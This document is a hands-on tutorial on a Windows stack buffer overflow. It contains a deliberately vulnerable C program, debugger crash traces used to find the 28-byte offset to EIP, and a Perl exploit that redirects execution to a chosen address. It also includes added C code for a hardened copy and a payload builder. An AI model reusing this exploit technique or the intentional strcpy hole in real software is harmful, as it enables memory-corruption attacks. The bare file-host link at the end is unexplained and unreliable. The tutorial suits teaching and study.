- Buffer Overflow
- A buffer overflow is the condition where a program copies more data into a fixed-size buffer than the buffer can hold, because the developer never checked the length of the input. On the stack this lets an attacker overwrite the saved return address, so that EIP is loaded with an address of the attacker's choosing (for example the address of malicious code).
- EIP holds the address of the next instruction to execute. When a function returns, EIP is loaded from the return address saved on the stack, which is why that value is so critical for the application. As attackers we pass far more data than the buffer can hold; the copy runs past the end of the buffer and overwrites the saved return address, and with it the value that ends up in EIP.
- Requirements
- 1. Windows OS
- 2. OllyDBG
- 3. Vulnerable application --> custom built (we will write it ourselves)
-    C compiler --> DevCPP 4.9.9.2
- 4. Perl --> for writing the exploit
- How a C program sees its command line, using nmap as the example:
- nmap -sS -sC -sV 192.168.0.1
- 0    1   2   3   4            <-- index of each argument
- argc and argv[]
- argc ---> number of arguments (here 5; the program name itself counts)
- argv[] -> contains the values of the arguments
- argv[0] -> nmap
- argv[1] -> -sS
- argv[2] -> -sC
- argv[3] -> -sV
- argv[4] -> 192.168.0.1
- So in our program argv[1] is the first string typed after the program name, and that is what we will overflow with.
- code.c
- ======
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- 
- int overflow(char *s)
- {
-     char buffer[10];     // this is our buffer: only 10 bytes on the stack
-     strcpy(buffer, s);   // vulnerable code: copies s with no length check
-     return 0;
- }
- 
- void exploit(void)
- {
-     printf("Buffer Overflow worked....\n");
- }
- 
- int main(int argc, char *argv[])
- {
-     int a = 0;
-     printf("You are in the main function.....\n");
-     overflow(argv[1]);   // argv[1] goes straight into the 10-byte buffer
-     if (a == 1)          // never true: exploit() is only reachable by hijacking EIP
-     {
-         exploit();
-     }
-     else
-     {
-         printf("Pappu's Buffer Overflow failed....\n");
-     }
-     return 0;
- }
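As an added example, not part of the original notes, here is the same 10-byte buffer with the copy bounded. The vulnerable overflow() is kept beside it for contrast; overflow_safe() and BUF_SIZE are names chosen here. The point is the exact boundary: 9 characters plus the terminating NUL fit, 10 characters do not, and over-long input is rejected rather than silently truncated.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10   /* same 10-byte buffer as code.c */

/* Vulnerable version from code.c, kept for contrast: strcpy() copies until
 * the NUL in s, however far away that is, so anything past 10 bytes runs
 * over the saved EBP and the saved return address. Never call this with
 * untrusted input. */
int overflow(const char *s)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, s);
    return 0;
}

/* Hardened version: measure the input, but never look further than
 * BUF_SIZE bytes into it. If no terminator shows up within BUF_SIZE bytes
 * the string cannot fit together with its NUL, so it is refused instead of
 * being truncated silently. Returns 0 on success, -1 on over-long input. */
int overflow_safe(const char *s)
{
    char buffer[BUF_SIZE];
    size_t len = 0;

    while (len < BUF_SIZE && s[len] != '\0')
        len++;
    if (len == BUF_SIZE)          /* 10 or more characters: no room for NUL */
        return -1;
    memcpy(buffer, s, len + 1);   /* text plus its terminator, at most 10 bytes */
    printf("copied \"%s\" (%zu bytes)\n", buffer, len + 1);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {               /* code.c skips this check and hands NULL to strcpy */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (overflow_safe(argv[1]) != 0) {
        fprintf(stderr, "input longer than %d characters rejected\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

Compile with the same Dev-C++ toolchain or any C compiler; the length check is the only thing standing between the 10-byte buffer and the saved return address, so there is no stack cookie or other mitigation to rely on in a build like the one used in these notes.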
- ==================
- 00401316 |. E8 94FFFFFF CALL goku.004012AF
- In OllyDBG, exploit() itself is at 004012AF; 00401316 is the address of the CALL instruction inside main() that invokes it. If we make overflow() return to 00401316, that CALL executes and exploit() runs even though a == 1 is never true. These addresses come from this particular build of goku.exe; for your own compile, read the address of the CALL from the debugger, it will not necessarily be the same.
- goku.exe LuciferTheMorningStarTheFirstFallenAngel
- crash
- Exception Offset: 6c:61:46:74 --> this is the value EIP was overwritten with. Read as little-endian bytes 74 46 61 6c it is the text "tFal", i.e. characters 28 to 31 of our argument.
- A --> 41 (ASCII code of 'A' in hex)
- goku.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- 41414141
- Exception Offset: 41414141
- A A A A --> four of our A's landed in EIP, but with a string of identical bytes we cannot tell which four, so this only proves that EIP is under our control, not where it is.
- 00401316 ---> the address as we read it (normal form)
- The x86 CPU stores and reads multi-byte values in little-endian order: the lowest byte sits at the lowest address. When EIP is loaded from the stack, the first byte we sent becomes the low byte of the address, so we must write the address byte-reversed.
- 00401316
- 00 40 13 16 ----> bytes in the order written
- 16 13 40 00 ----> little-endian form, the order the bytes must appear in our input
- To find exactly which four bytes of the input land in EIP, send a long string in which every 4-byte sequence is unique (here a 128-character hex string):
- 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- goku.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- Exception Offset: 35376239
- 35376239
- 35 37 62 39 ----> bytes of the value
- 39 62 37 35 ----> little-endian order, i.e. the order they appeared in our input
- 9b75 ----> the same bytes as ASCII (0x39 = '9', 0x62 = 'b', 0x37 = '7', 0x35 = '5')
- 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- 1e66186a8e7f4a61ebaae3f46ae2 9b75 ----> "9b75" starts after 28 characters, so the offset from the start of the input to the return address is 28 bytes
- A --> 41
- B --> 42
- C --> 43
- D --> 44
- E --> 45
- To confirm the offset, send 28 A's followed by BCDE:
- AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
- 42434445 ----> BCDE as bytes
- 45444342 ----> the same bytes as EIP reads them, little-endian
- Exception Offset: 45444342 ----> exactly BCDE, so bytes 28 to 31 of the input are the ones that become EIP
- vegeta.pl
- =========
- use strict;
- use warnings;
- 
- my $junk = "\x41" x 28;          # 28 bytes of junk data: fills the buffer up to the return address
- my $eip = "\x16\x13\x40\x00";    # address of the CALL to exploit(), 0x00401316, in little-endian order
- my $exploit = $junk . $eip;      # concatenating the two strings: 32 bytes in total
- print "Buffer Overflow is about to run....\n";
- system("goku.exe", $exploit);    # the 0x00 is the last byte, so it doubles as the argv terminator
-                                  # and strcpy() copies it into place; a 0x00 anywhere earlier would cut the string short
- print "Congratulations on the wedding, Goku's Buffer Overflow.....\n";
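Added example, not from the original notes or the vegeta.pl script: a small C program that does the two calculations from the steps above. find_offset() turns the EIP value shown in the crash dialog back into its four little-endian bytes and looks for them in the string that was sent, reporting an ambiguous result when the four bytes occur more than once (which is why a string of only A's cannot give the offset). build_payload() then assembles junk plus the little-endian return address exactly as vegeta.pl does, le32_read() shows what EIP would load from those bytes, and bytes_before_nul() confirms that the only 0x00 is the final byte. The sample inputs are the strings and EIP values recorded above; the function names and the `payload` buffer are choices made here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Split a 32-bit value into the four bytes it occupies in memory on x86:
 * little-endian, so the low byte of the value is the FIRST byte we sent. */
static void le32_bytes(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Reverse direction: read four little-endian bytes as one 32-bit value,
 * which is what the CPU does when it pops the return address into EIP. */
uint32_t le32_read(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Locate the four EIP bytes inside the string we sent.
 * Returns the offset of the match, -1 if the bytes never occur, and -2 if
 * they occur more than once (pattern not unique enough to trust). */
int find_offset(const char *pattern, uint32_t eip)
{
    unsigned char needle[4];
    size_t len = strlen(pattern);
    int hit = -1;

    le32_bytes(eip, needle);
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(pattern + i, needle, 4) == 0) {
            if (hit != -1)
                return -2;
            hit = (int)i;
        }
    }
    return hit;
}

/* Payload filled by build_payload(): `offset` filler bytes, then the target
 * address in little-endian order, the same bytes vegeta.pl produces with
 * "\x41" x 28 . "\x16\x13\x40\x00". Returns the payload length, or -1 if
 * it would not fit. */
unsigned char payload[64];

int build_payload(int offset, uint32_t ret_addr, unsigned char filler)
{
    if (offset < 0 || (size_t)offset + 4 > sizeof payload)
        return -1;
    memset(payload, filler, (size_t)offset);
    le32_bytes(ret_addr, payload + offset);
    return offset + 4;
}

/* argv[] strings stop at the first 0x00, so only the bytes before it reach
 * strcpy(). Returns that count; for our address it must be len - 1, i.e. the
 * NUL is the last byte and lands as the string terminator. */
int bytes_before_nul(const unsigned char *buf, int len)
{
    for (int i = 0; i < len; i++)
        if (buf[i] == 0)
            return i;
    return len;
}

int main(void)
{
    /* Inputs and EIP values copied from the crashes recorded in the notes. */
    const char *lucifer = "LuciferTheMorningStarTheFirstFallenAngel";
    const char *pattern = "1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba";
    const char *confirm = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAA" "BCDE";
    const char *all_a   = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AA";

    printf("Lucifer   EIP=6c614674 -> offset %d\n", find_offset(lucifer, 0x6c614674u));
    printf("pattern   EIP=35376239 -> offset %d\n", find_offset(pattern, 0x35376239u));
    printf("A*28+BCDE EIP=45444342 -> offset %d\n", find_offset(confirm, 0x45444342u));
    printf("A*32      EIP=41414141 -> offset %d (ambiguous)\n", find_offset(all_a, 0x41414141u));

    int len = build_payload(28, 0x00401316u, 0x41);
    printf("payload %d bytes, address bytes:", len);
    for (int i = 28; i < len; i++)
        printf(" %02x", payload[i]);
    printf(" -> EIP would load %08x\n", le32_read(payload + 28));
    printf("bytes before first NUL: %d\n", bytes_before_nul(payload, len));
    return 0;
}
```

The -2 result for the all-A string is the check the A-only crash above cannot give you; the hex pattern used in the notes happens to have no repeated 4-byte run, but with only 16 symbols that is luck rather than a guarantee, so a generated cyclic pattern is the safer choice for longer buffers.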
- https://ufile.io/s6f8v